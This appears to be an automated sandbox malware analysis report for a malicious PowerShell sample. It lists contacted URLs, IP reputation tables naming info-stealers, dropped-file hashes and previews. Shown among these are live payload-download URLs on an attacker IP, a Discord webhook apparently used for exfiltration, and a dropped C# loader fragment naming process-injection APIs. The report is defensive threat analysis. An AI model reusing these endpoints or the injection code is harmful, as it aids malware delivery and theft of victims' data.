                                          https://github.com/LimerBoy/StormKittypowershell.exe, 00000004.00000002.1800480910.00000277AEF9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AD5D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                            high
                                            http://147.45.44.131/infopage/yijth.exeFcsc.exe, 00000006.00000003.1725690135.000001CEA7FB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              high
                                              https://stackoverflow.com/q/2152978/23354powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                high
                                                http://147.45.44.131/infopage/vmcurl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://147.45.dRegAsm.exe, 00000008.00000002.4146688512.00000000054A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/powershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1718918139.00000201101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718918139.0000020110074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://147.45.44.131/infopage/vcurl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://147.45.44.131/infopage/vfrcxq.ps1urlrc6curl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1691372852.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AD0B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://urn.to/r/sds_seepowershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          high
                                                          http://147.45.44.131/infopage/vfrcxq.ps1TRegAsm.exe, 00000008.00000002.4128014946.00000000012AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1691372852.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AD0B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4131974339.0000000002F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://147.45.44.131/infopage/vfrcxq.ps1meRegAsm.exe, 00000008.00000002.4149072084.0000000005570000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://147.45.44powershell.exe, 00000000.00000002.1691372852.0000020101632000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              147.45.44.131
                                                              unknownRussian Federation
                                                              2895FREE-NET-ASFREEnetEUfalse
                                                              157.20.182.177
                                                              unknownunknown
                                                              24297FCNUniversityPublicCorporationOsakaJPtrue
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1582969
                                                              Start date and time:2025-01-01 08:47:06 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 9m 1s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:13
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:trwsfg.ps1
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.expl.evad.winPS1@16/18@0/2
                                                              EGA Information:
                                                              • Successful, ratio: 66.7%
                                                              HCA Information:
                                                              • Successful, ratio: 91%
                                                              • Number of executed functions: 61
                                                              • Number of non-executed functions: 3
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .ps1
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 199.232.214.172, 20.109.210.53, 13.107.246.45
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 7528 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              TimeTypeDescription
                                                              02:47:58API Interceptor53x Sleep call for process: powershell.exe modified
                                                              02:48:10API Interceptor8552496x Sleep call for process: RegAsm.exe modified
                                                              07:48:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              147.45.44.131iviewers.dllGet hashmaliciousLummaCBrowse
                                                              • 147.45.44.131/infopage/hgfpj.exe
                                                              qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                              • 147.45.44.131/infopage/inbg.exe
                                                              iviewers.dllGet hashmaliciousLummaCBrowse
                                                              • 147.45.44.131/infopage/inbg.exe
                                                              Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                              • 147.45.44.131/infopage/bnkh.exe
                                                              htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 147.45.44.131/infopage/ung0.exe
                                                              Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                              • 147.45.44.131/infopage/ilk.exe
                                                              Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                                                              • 147.45.44.131/infopage/bgfi.ps1
                                                              Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                              • 147.45.44.131/infopage/ung0.exe
                                                              EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 147.45.44.131/infopage/vsom.exe
                                                              MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                              • 147.45.44.131/infopage/Tom.exe
                                                              157.20.182.177bKxtUOPLtR.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  bg.microsoft.map.fastly.netvj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                                                  • 199.232.210.172
                                                                  Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
                                                                  • 199.232.210.172
                                                                  rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                  • 199.232.210.172
                                                                  2VsJzzWTpA.exeGet hashmaliciousCobaltStrikeBrowse
                                                                  • 199.232.214.172
                                                                  2VsJzzWTpA.exeGet hashmaliciousUnknownBrowse
                                                                  • 199.232.210.172
                                                                  YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                                                  • 199.232.210.172
                                                                  O782uurN5d.exeGet hashmaliciousDCRatBrowse
                                                                  • 199.232.210.172
                                                                  bKxtUOPLtR.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                  • 199.232.210.172
                                                                  46VHQmFDxC.exeGet hashmaliciousRedLineBrowse
                                                                  • 199.232.210.172
                                                                  vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                  • 199.232.214.172
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  FCNUniversityPublicCorporationOsakaJPbKxtUOPLtR.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                  • 157.20.182.177
                                                                  https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                  • 157.20.182.177
                                                                  armv4l.elfGet hashmaliciousMiraiBrowse
                                                                  • 163.227.210.66
                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.20.21.157
                                                                  1.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.20.21.140
                                                                  la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 157.20.218.11
                                                                  3.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.20.207.5
                                                                  3.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.20.68.123
                                                                  3.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.16.228.185
                                                                  arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 157.20.68.153
                                                                  FREE-NET-ASFREEnetEUhttps://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                  • 147.45.44.131
                                                                  Loader.exeGet hashmaliciousMeduza StealerBrowse
                                                                  • 147.45.44.216
                                                                  tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                                                  • 147.45.49.155
                                                                  soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                                                  • 147.45.44.216
                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131
                                                                  search.htaGet hashmaliciousUnknownBrowse
                                                                  • 147.45.112.248
                                                                  e9aa0b4540115b3dcec3af70b6de27e54e4a0fa96d1d3.exeGet hashmaliciousRedLineBrowse
                                                                  • 147.45.44.224
                                                                  TCKxnQ5CPn.exeGet hashmaliciousUnknownBrowse
                                                                  • 147.45.49.155
                                                                  good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                  • 147.45.44.151
                                                                  n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                  • 147.45.49.155
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.253995428229511
                                                                  Encrypted:false
                                                                  SSDEEP:6:kK7Xm99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:TWkDImsLNkPlE99SNxAhUe/3
                                                                  MD5:F5E565A2FF8A911152FCEC423D2CF51F
                                                                  SHA1:0D8951371B76003CF76A391C1CB664E36FCEF38F
                                                                  SHA-256:BC94AEBB40FAD5D2EF7AF559BADE931C7263ED2478F9B098D3A03D06759AF54B
                                                                  SHA-512:2496D4B5925A1D245171E29C74693F17834C500E1E2F16E77ECE85A495BD6F024877FBE2C8BF6D28D86BCED87C687B1ED8DB9D8A3A0F36927B59AA7F3C0B7C41
                                                                  Malicious:false
                                                                  Preview:p...... ...........!\..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):2836
                                                                  Entropy (8bit):5.414904208953175
                                                                  Encrypted:false
                                                                  SSDEEP:48:5AzsSU4Yymda+ms4RIoUxqr9t5/78NRHuGxJZKaVEouYAgwd64rHLjtv+:5AzlHYvUsIfeqrh7KRnJ5Eo9Adrx+
                                                                  MD5:2A5CB820F33C4C03AC8D7E4926C2BBA7
                                                                  SHA1:8034EB7B5434E307215886B9705BCE036491A5B5
                                                                  SHA-256:B6159770629F78F742325BF116643F9B85C21ED1B0811589228A1B08C86A0AB6
                                                                  SHA-512:7EE281E489B87F7B09B5AB0D66890DD02AA99DC2A0704FA1353E39ED47CF04B3665806E5F220CE379CC9DCA8C7949B628E88AAA1AFAC6F0287C845FDFA626D70
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1940658735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllultnxj:NllU
                                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                  Malicious:false
                                                                  Preview:@...e................................................@..........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):11063
                                                                  Entropy (8bit):4.546700076718714
                                                                  Encrypted:false
                                                                  SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo6PT:2oYLoH97t/Z7pgjvzf5uT
                                                                  MD5:B5C3A2D03FF4C721192716F326C77DEA
                                                                  SHA1:6B754FD988CA58865674B711ABA76D3C6B2C5693
                                                                  SHA-256:AB42FE5FD08CB87663E130F99F96124FDD37D825D081B9712B0BAD8B6F270FAC
                                                                  SHA-512:D32E5A98C12B6B85D1913555EA54F837CD0FC647CA945AEF9D75FFADE06506BE1F4A2348827F11C4EEAE0796E4156C8F352E3C0F9A6E2CDC93CB501BCDF2C248
                                                                  Malicious:true
                                                                  Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):204
                                                                  Entropy (8bit):5.073268369296757
                                                                  Encrypted:false
                                                                  SSDEEP:6:pAu+H2L/6K2wkn23f4lklAzxszIwkn23f4lkl9n:p37L/6KRfyQf3
                                                                  MD5:17B310D04DB0566D8260332A9AD30453
                                                                  SHA1:4E10B6E4F8A97559591C91A85EB30F82D84F0282
                                                                  SHA-256:29F83677DE7360A247811818383CBF2DC2F419F599999A53255A056BF094F5AC
                                                                  SHA-512:BAEAD0A5FF11281D0BA96C0F7D9E956526547C9ED1C991918EBA3A8BF5C6DB8B2503DF726B65DF23915EE738080A3BD193FFE85738B33F65E29C7637F552E0A3
                                                                  Malicious:true
                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.0.cs"
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):9728
                                                                  Entropy (8bit):4.631776137998674
                                                                  Encrypted:false
                                                                  SSDEEP:192:MRH6HN4QhfNQ8q8888yYAdwRjOafUxRa95MqBY4eN457:nNxNw9OI+a95MqyS57
                                                                  MD5:AA9AFBDCA51F52BC29FB01C9376C9E21
                                                                  SHA1:763A2629684E5D75E8B8DB05B91948CDC65FCBC0
                                                                  SHA-256:6468629A530DE3A4DFEFC5F3AECF8F1AA79FB956118ABFCAA9C6CB7D93EC21C9
                                                                  SHA-512:E7AD5D753ED4C9E05AC4253E003439A7A7E1E1E14A8D716AE16A18E90C41EA47D50C1776935E8DCDD1F04F1E3256F84DAB5B415EA7611D05520AF1ED54CFEEC5
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P.ug...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                  Category:modified
                                                                  Size (bytes):704
                                                                  Entropy (8bit):5.279642932464335
                                                                  Encrypted:false
                                                                  SSDEEP:12:KJN/IR37L/6KRfyQf+KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBIdn6KRfdf+Kax5DqBVKVrdFAMBJTH
                                                                  MD5:D1571AA899B048176563927D10EA05FA
                                                                  SHA1:6D9056B40501FCB307299BB2404563F54A8A6F96
                                                                  SHA-256:6151158BAD933CD46B0109D873252E7FED469968C7D4C8BEC64B9D669853DC6A
                                                                  SHA-512:E15AD13A6626D37F40AA518F54C2F54E467490D844BBB33FE56786EF241E0AA66D9775FC1DD86F8C4C1E1EE8F56D4A81F7C66446B232F3EEB10417F7CBF7F6DC
                                                                  Malicious:false
                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:MSVC .res
                                                                  Category:dropped
                                                                  Size (bytes):652
                                                                  Entropy (8bit):3.1068385801011593
                                                                  Encrypted:false
                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grypak7YnqqNPN5Dlq5J:+RI+ycuZhNLakSNPNnqX
                                                                  MD5:2DF6576FA9373B2F607CA9B4E8919537
                                                                  SHA1:46AA83BACB7E6D2B91863BFC107F8C565487FFB2
                                                                  SHA-256:C3EDF3B3BC98257F51964EA4A5E9E9A7F22B551A30506F4C272AB3B7B45F7529
                                                                  SHA-512:0581D644E10D67AC3A2D1F16F4F82D69555BF8A3E19C3150C30A0FA9936B57AFC36645207C34B9EFB54A4DD66BFF137528BD07645A62E7697E1A67B5114DEAD0
                                                                  Malicious:false
                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.3.b.j.t.j.x.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.3.b.j.t.j.x.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Jan 1 09:13:53 2025, 1st section name ".debug$S"
                                                                  Category:dropped
                                                                  Size (bytes):1332
                                                                  Entropy (8bit):3.989790748970161
                                                                  Encrypted:false
                                                                  SSDEEP:24:HOFzW9nZfy0NDfHDwKEsmNwI+ycuZhNLakSNPNnqS2d:ZBd0Khmm1ulLa3XqSG
                                                                  MD5:4942B9B59567C4DDEB134944F05B9DCD
                                                                  SHA1:5398949A9C27D8A4AFD96401470FD45CB18F609B
                                                                  SHA-256:41A02016BB563D7AACC4689C4825F3CCD314B083452C735C39A1787CD6A5292D
                                                                  SHA-512:5577798D5F849BA87E6815F664C414CE85138F732499404BF1EFA1D4EE3C1AB27500E112D07C4C0E6CC925B64721288F207118C860C9EDE33EEFD30F6CDB02BE
                                                                  Malicious:false
                                                                  Preview:L...Q.ug.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\03bjtjx4\CSCBF3C1B7A512F4AE098C09161EC8504E.TMP................-.Wo.7;/`|...7..........4.......C:\Users\user\AppData\Local\Temp\RES3454.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.3.b.j.t.j.x.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
